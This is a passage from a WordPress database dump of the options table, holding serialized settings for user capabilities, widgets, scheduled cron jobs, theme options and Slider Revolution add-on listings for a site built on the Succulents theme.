edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}}','yes'),(96,'fresh_site','0','yes'),(97,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(99,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'sidebars_widgets','a:26:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:24:\"qodef_separator_widget-8\";}s:7:\"sidebar\";a:7:{i:0;s:13:\"media_image-8\";i:1;s:7:\"text-21\";i:2;s:24:\"qodef_blog_list_widget-2\";i:3;s:24:\"qodef_separator_widget-2\";i:4;s:13:\"media_image-3\";i:5;s:33:\"qodef_social_icons_group_widget-2\";i:6;s:13:\"media_video-3\";}s:19:\"footer_top_column_1\";a:6:{i:0;s:7:\"text-19\";i:1;s:6:\"text-7\";i:2;s:24:\"qodef_separator_widget-5\";i:3;s:6:\"text-8\";i:4;s:7:\"text-18\";i:5;s:7:\"text-17\";}s:19:\"footer_top_column_2\";a:2:{i:0;s:7:\"text-10\";i:1;s:29:\"qodef_contact_form_7_widget-2\";}s:19:\"footer_top_column_3\";a:2:{i:0;s:6:\"text-9\";i:1;s:24:\"qodef_separator_widget-6\";}s:19:\"footer_top_column_4\";a:0:{}s:22:\"footer_bottom_column_1\";a:0:{}s:22:\"footer_bottom_column_2\";a:0:{}s:22:\"footer_bottom_column_3\";a:0:{}s:29:\"qodef-header-widget-logo-area\";a:0:{}s:29:\"qodef-header-widget-menu-area\";a:2:{i:1;s:21:\"qodef_search_opener-2\";i:2;s:24:\"qodef_side_area_opener-3\";}s:8:\"sidearea\";a:9:{i:0;s:13:\"media_image-5\";i:1;s:7:\"text-12\";i:2;s:24:\"qodef_separator_widget-9\";i:3;s:24:\"qodef_blog_list_widget-4\";i:4;s:25:\"qodef_separator_widget-11\";i:5;s:27:\"qodef_social_icon_widget-14\";i:6;s:27:\"qodef_social_icon_widget-15\";i:7;s:27:\"qodef_social_icon_widget-16\";i:8;s:27:\"qodef_social_icon_widget-17\";}s:26:\"fullscreen_search_column_1\";a:0:{}s:26:\"fullscreen_search_column_2\";a:0:{}s:26:\"fullscreen_search_column_3\";a:0:{}s:21:\"fullscreen_menu_above\";a:0:{}s:21:\"fullscreen_menu_below\";a:0:{}s:19:\"qodef-vertical-area\";a:4:{i:0;s:27:\"qodef_social_icon_widget-22\";i:1;s:27:\"qodef_social_icon_widget-23\";i:2;s:27:\"qodef_social_icon_widget-24\";i:3;s:27:\"qodef_social_icon_widget-25\";}s:28:\"qodef-right-from-mobile-logo\";a:0:{}s:18:\"qodef-sticky-right\";a:0:{}s:18:\"qodef-top-bar-left\";a:5:{i:0;s:6:\"text-2\";i:1;s:26:\"qodef_social_icon_widget-2\";i:2;s:26:\"qodef_social_icon_widget-3\";i:3;s:26:\"qodef_social_icon_widget-4\";i:4;s:26:\"qodef_social_icon_widget-5\";}s:19:\"qodef-top-bar-right\";a:2:{i:1;s:21:\"qodef_search_opener-3\";i:2;s:24:\"qodef_side_area_opener-2\";}s:4:\"team\";a:5:{i:0;s:6:\"text-3\";i:1;s:20:\"qodef_recent_posts-2\";i:2;s:13:\"media_image-2\";i:3;s:6:\"text-4\";i:4;s:33:\"qodef_social_icons_group_widget-4\";}s:12:\"shop-sidebar\";a:2:{i:0;s:8:\"search-2\";i:1;s:24:\"qodef_separator_widget-3\";}s:6:\"home-6\";a:6:{i:0;s:13:\"media_image-6\";i:1;s:7:\"text-13\";i:2;s:24:\"qodef_blog_list_widget-5\";i:3;s:13:\"media_image-7\";i:4;s:33:\"qodef_social_icons_group_widget-3\";i:5;s:13:\"media_video-2\";}s:13:\"array_version\";i:3;}','yes'),(103,'cron','a:25:{i:1705734094;a:1:{s:33:\"wc_admin_process_orders_milestone\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1705734107;a:1:{s:21:\"wordfence_hourly_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1705734700;a:1:{s:21:\"wordfence_ls_ntp_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1705735084;a:1:{s:29:\"wc_admin_unsnooze_admin_notes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1705736227;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1705741150;a:2:{s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1705741439;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1705742267;a:2:{s:21:\"sb_instagram_cron_job\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:23:\"sb_instagram_twicedaily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1705742329;a:1:{s:15:\"sbi_feed_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1705745971;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1705763256;a:1:{s:28:\"woocommerce_cleanup_sessions\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1705766492;a:1:{s:26:\"wordfence_daily_autoUpdate\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705766507;a:1:{s:20:\"wordfence_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705784350;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705784439;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705784440;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705784866;a:2:{s:33:\"woocommerce_cleanup_personal_data\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:30:\"woocommerce_tracker_send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705785134;a:1:{s:14:\"wc_admin_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705795200;a:1:{s:27:\"woocommerce_scheduled_sales\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705795656;a:1:{s:24:\"woocommerce_cleanup_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1705832367;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1705903200;a:2:{s:29:\"sb_instagram_feed_issue_email\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"sbiweekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}s:23:\"sbi_notification_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"sbiweekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1705990423;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1706136262;a:1:{s:23:\"sbi_usage_tracking_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(104,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_media_image','a:7:{i:2;a:15:{s:13:\"attachment_id\";i:390;s:3:\"url\";s:78:\"http://succulents.select-themes.com/wp-content/uploads/2018/01/banner-team.jpg\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"width\";i:353;s:6:\"height\";i:235;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"o\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:35:\"http://succulents.select-themes.com\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}i:3;a:15:{s:13:\"attachment_id\";i:390;s:3:\"url\";s:86:\"http://succulents.select-themes.com/wp-content/uploads/2018/01/banner-team-300x200.jpg\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:6:\"medium\";s:5:\"width\";i:353;s:6:\"height\";i:235;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"o\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:36:\"http://tummyrevolution.com/buy-book/\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}i:5;a:15:{s:13:\"attachment_id\";i:3061;s:3:\"url\";s:82:\"http://succulents.select-themes.com/wp-content/uploads/2018/02/side-area-img-4.jpg\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"a\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}i:6;a:15:{s:13:\"attachment_id\";i:3061;s:3:\"url\";s:82:\"http://succulents.select-themes.com/wp-content/uploads/2018/02/side-area-img-4.jpg\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"a\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:36:\"http://tummyrevolution.com/my-story/\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}i:7;a:15:{s:13:\"attachment_id\";i:390;s:3:\"url\";s:86:\"http://succulents.select-themes.com/wp-content/uploads/2018/01/banner-team-300x200.jpg\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:6:\"medium\";s:5:\"width\";i:353;s:6:\"height\";i:235;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"o\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:36:\"http://tummyrevolution.com/buy-book/\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}i:8;a:15:{s:13:\"attachment_id\";i:3061;s:3:\"url\";s:84:\"http://tummyrevolution.com/wp-content/uploads/2018/02/me-small-square-with-hello.jpg\";s:5:\"title\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:1:\"a\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:36:\"http://tummyrevolution.com/my-story/\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_media_video','a:3:{i:2;a:11:{s:7:\"preload\";s:8:\"metadata\";s:4:\"loop\";b:0;s:7:\"content\";s:0:\"\";s:3:\"mp4\";s:0:\"\";s:3:\"m4v\";s:0:\"\";s:4:\"webm\";s:0:\"\";s:3:\"ogv\";s:0:\"\";s:3:\"flv\";s:0:\"\";s:13:\"attachment_id\";i:0;s:3:\"url\";s:28:\"https://youtu.be/O-ONccSRmJ8\";s:5:\"title\";s:24:\"Take a Sneak Peak Inside\";}i:3;a:11:{s:7:\"preload\";s:8:\"metadata\";s:4:\"loop\";b:0;s:7:\"content\";s:0:\"\";s:3:\"mp4\";s:0:\"\";s:3:\"m4v\";s:0:\"\";s:4:\"webm\";s:0:\"\";s:3:\"ogv\";s:0:\"\";s:3:\"flv\";s:0:\"\";s:13:\"attachment_id\";i:0;s:3:\"url\";s:28:\"https://youtu.be/O-ONccSRmJ8\";s:5:\"title\";s:24:\"Take a Sneak Peak Inside\";}s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(112,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(113,'recovery_keys','a:0:{}','yes'),(114,'theme_mods_twentytwenty','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1585602586;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";}s:9:\"sidebar-2\";a:3:{i:0;s:10:\"archives-2\";i:1;s:12:\"categories-2\";i:2;s:6:\"meta-2\";}}}}','yes'),(124,'w3tc_state','{\"common.install\":1585602039,\"license.status\":\"no_key\",\"license.next_check\":1693307299,\"license.terms\":\"\",\"common.show_note.plugins_updated\":true,\"common.show_note.plugins_updated.timestamp\":1692875365}','no'),(147,'current_theme','Succulents','yes'),(148,'theme_mods_succulents','a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:4:{s:23:\"divided-left-navigation\";i:54;s:24:\"divided-right-navigation\";i:63;s:19:\"vertical-navigation\";i:79;s:16:\"popup-navigation\";i:64;}s:18:\"custom_css_post_id\";i:-1;}','yes'),(149,'theme_switched','','yes'),(154,'recently_activated','a:0:{}','yes'),(156,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.8.6\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1585602726;s:7:\"version\";s:5:\"5.1.7\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(157,'envato_market','a:2:{s:16:\"is_plugin_active\";s:0:\"\";s:17:\"installed_version\";s:5:\"2.0.3\";}','yes'),(158,'revslider_servers','a:3:{i:0;s:22:\"themepunch-ext-a.tools\";i:1;s:22:\"themepunch-ext-b.tools\";i:2;s:22:\"themepunch-ext-c.tools\";}','yes'),(159,'revslider_server_refresh','1706557720','yes'),(160,'revslider-update-check-short','1705712453','yes'),(161,'revslider-connection','1','yes'),(162,'revslider-update-hash','955b1a655d22a6f098549f636f75630c','yes'),(163,'revslider-latest-version','6.6.20','yes'),(164,'revslider-stable-version','4.2.0','yes'),(165,'revslider-notices','a:2:{i:0;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"0.9.9\";s:4:\"text\";s:952:\"
\n\n \"Slider\n \"Essential\n\";s:4:\"code\";s:9:\"TPSRCW111\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:1;O:8:\"stdClass\":10:{s:7:\"version\";s:5:\"9.9.9\";s:4:\"text\";s:527:\"
\";s:4:\"code\";s:11:\"TPSNOTR3011\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:10:\"registered\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}}','yes'),(166,'revslider-addons','O:8:\"stdClass\":35:{s:28:\"revslider-particlewave-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"380\";s:9:\"releaseid\";s:2:\"29\";s:4:\"slug\";s:28:\"revslider-particlewave-addon\";s:12:\"version_from\";s:6:\"6.5.15\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Particle Wave\";s:6:\"line_1\";s:36:\"Create 3D particle and polygon grids\";s:6:\"line_2\";s:40:\"with lots of style and animation options\";s:9:\"available\";s:5:\"1.1.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:1:\"9\";s:11:\"last_update\";s:10:\"2023-08-24\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:79:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_particlewave.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PW\";}}s:25:\"revslider-particles-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"424\";s:9:\"releaseid\";s:1:\"7\";s:4:\"slug\";s:25:\"revslider-particles-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Particle Effects\";s:6:\"line_1\";s:17:\"Let\'s Parti(cle)!\";s:6:\"line_2\";s:51:\"Add interactive particle animations to your sliders\";s:9:\"available\";s:5:\"3.3.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:2:\"10\";s:11:\"last_update\";s:10:\"2023-07-28\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_particles.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PT\";}}s:27:\"revslider-bubblemorph-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"405\";s:9:\"releaseid\";s:2:\"20\";s:4:\"slug\";s:27:\"revslider-bubblemorph-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"BubbleMorph\";s:6:\"line_1\";s:26:\"Include BubbleMorph Layers\";s:6:\"line_2\";s:33:\"for a decorative lava lamp effect\";s:9:\"available\";s:5:\"3.0.8\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"20\";s:11:\"last_update\";s:10:\"2023-06-26\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_bubblemorph.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BM\";}}s:26:\"revslider-thecluster-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"481\";s:9:\"releaseid\";s:2:\"28\";s:4:\"slug\";s:26:\"revslider-thecluster-addon\";s:12:\"version_from\";s:5:\"6.6.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"The Cluster\";s:6:\"line_1\";s:24:\"Cluster Particle Effects\";s:6:\"line_2\";s:27:\"with millions of Variations\";s:9:\"available\";s:6:\"1.0.10\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"22\";s:11:\"last_update\";s:10:\"2023-06-26\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_cluster.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TC\";}}s:29:\"revslider-fluiddynamics-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"493\";s:9:\"releaseid\";s:2:\"31\";s:4:\"slug\";s:29:\"revslider-fluiddynamics-addon\";s:12:\"version_from\";s:6:\"6.4.10\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Fluid Dynamics\";s:6:\"line_1\";s:46:\"Creating breathtaking Dynamic Fluid animations\";s:6:\"line_2\";s:25:\"as layer or as background\";s:9:\"available\";s:5:\"1.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"27\";s:11:\"last_update\";s:10:\"2023-11-16\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:72:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_fluid.png\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FD\";}}s:30:\"revslider-transitionpack-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"369\";s:9:\"releaseid\";s:2:\"28\";s:4:\"slug\";s:30:\"revslider-transitionpack-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Advanced Transitions\";s:6:\"line_1\";s:43:\"Add never-before-seen slide transitions to \";s:6:\"line_2\";s:42:\"Slider Revolution with the power of WEBGL.\";s:9:\"available\";s:5:\"1.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"30\";s:11:\"last_update\";s:10:\"2023-02-23\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_transition.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"AT\";}}s:27:\"revslider-beforeafter-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"507\";s:9:\"releaseid\";s:2:\"15\";s:4:\"slug\";s:27:\"revslider-beforeafter-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Before & After\";s:6:\"line_1\";s:35:\"Compare two slides before and after\";s:6:\"line_2\";s:33:\"use it vertically or horizontally\";s:9:\"available\";s:5:\"3.1.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"40\";s:11:\"last_update\";s:10:\"2023-05-20\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_beforeafter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BA\";}}s:26:\"revslider-typewriter-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"418\";s:9:\"releaseid\";s:1:\"3\";s:4:\"slug\";s:26:\"revslider-typewriter-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"Typewriter Effect\";s:6:\"line_1\";s:27:\"Enhance your slider\'s text \";s:6:\"line_2\";s:24:\"with typewriter effects \";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:2:\"50\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_typewriter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TW\";}}s:25:\"revslider-mousetrap-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"499\";s:9:\"releaseid\";s:2:\"24\";s:4:\"slug\";s:25:\"revslider-mousetrap-addon\";s:12:\"version_from\";s:5:\"6.6.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Mousetrap\";s:6:\"line_1\";s:31:\"Create all kinds of interesting\";s:6:\"line_2\";s:19:\" mouse interactions\";s:9:\"available\";s:5:\"3.1.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How 